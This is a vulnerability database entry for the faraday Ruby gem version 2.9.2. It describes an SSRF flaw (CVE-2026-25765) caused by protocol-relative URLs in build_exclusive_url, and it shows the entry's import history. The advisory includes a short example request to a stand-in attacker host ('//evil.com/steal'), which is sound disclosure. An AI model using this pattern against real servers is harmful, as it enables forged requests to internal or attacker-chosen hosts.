Search for packages
| purl | pkg:gem/faraday@2.9.2 |
| Vulnerability | Summary | Fixed by |
|---|---|---|
|
VCID-ycrm-uaf6-73a7
Aliases: CVE-2026-25765 GHSA-33mh-2634-fwr2 |
Faraday affected by SSRF via protocol-relative URL host override in build_exclusive_url Faraday's `build_exclusive_url` method (in `lib/faraday/connection.rb`) uses Ruby's `URI#merge` to combine the connection's base URL with a user-supplied path. Per RFC 3986, protocol-relative URLs (e.g. `//evil.com/path`) are treated as network-path references that override the base URL's host/authority component. This means that if any application passes user-controlled input to Faraday's `get()`, `post()`, `build_url()`, or other request methods, an attacker can supply a protocol-relative URL like `//attacker.com/endpoint` to redirect the request to an arbitrary host, enabling Server-Side Request Forgery (SSRF). The `./` prefix guard added in v2.9.2 (PR #1569) explicitly exempts URLs starting with `/`, so protocol-relative URLs bypass it entirely. **Example:** ```ruby conn = Faraday.new(url: 'https://api.internal.com') conn.get('//evil.com/steal') |
Affected by 2 other vulnerabilities. |
| Vulnerability | Summary | Aliases |
|---|---|---|
| This package is not known to fix vulnerabilities. | ||
| Date | Actor | Action | Vulnerability | Source | VulnerableCode Version |
|---|---|---|---|---|---|
| 2026-06-06T06:51:06.560184+00:00 | GitLab Importer | Affected by | VCID-ycrm-uaf6-73a7 | https://gitlab.com/gitlab-org/advisories-community/-/blob/main/gem/faraday/CVE-2026-25765.yml | 38.6.0 |
| 2026-06-04T18:16:00.936313+00:00 | Ruby Importer | Affected by | VCID-ycrm-uaf6-73a7 | https://github.com/rubysec/ruby-advisory-db/blob/master/gems/faraday/CVE-2026-25765.yml | 38.6.0 |